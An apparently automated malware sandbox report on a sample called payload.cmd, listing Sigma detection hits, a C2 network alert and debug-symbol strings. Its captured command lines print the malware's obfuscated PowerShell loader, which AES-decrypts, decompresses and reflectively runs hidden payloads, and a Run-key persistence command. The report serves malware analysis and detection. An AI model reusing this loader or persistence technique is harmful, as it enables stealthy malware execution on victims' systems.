'$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBz
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+'
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+'a'+[Char](116)+'
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5760, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 1788, ProcessName: schtasks.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); , CommandLine: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBz
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2064, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5760, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2064, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5760, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{8069b1fa-ba4a-4345-b7be-cabb605146ce}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 1796, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 912, ProcessName: svchost.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2460, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 2064, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-03T14:55:08.393977+020020355951Domain Observed Used for C2 Detected154.216.20.1326969192.168.2.749719TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,38_2_00401000
Source: unknownHTTPS traffic detected: 195.201.57.90:443 -> 192.168.2.7:49720 version: TLS 1.2
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.pdbk. source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbh source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.pdbg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Transactions.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
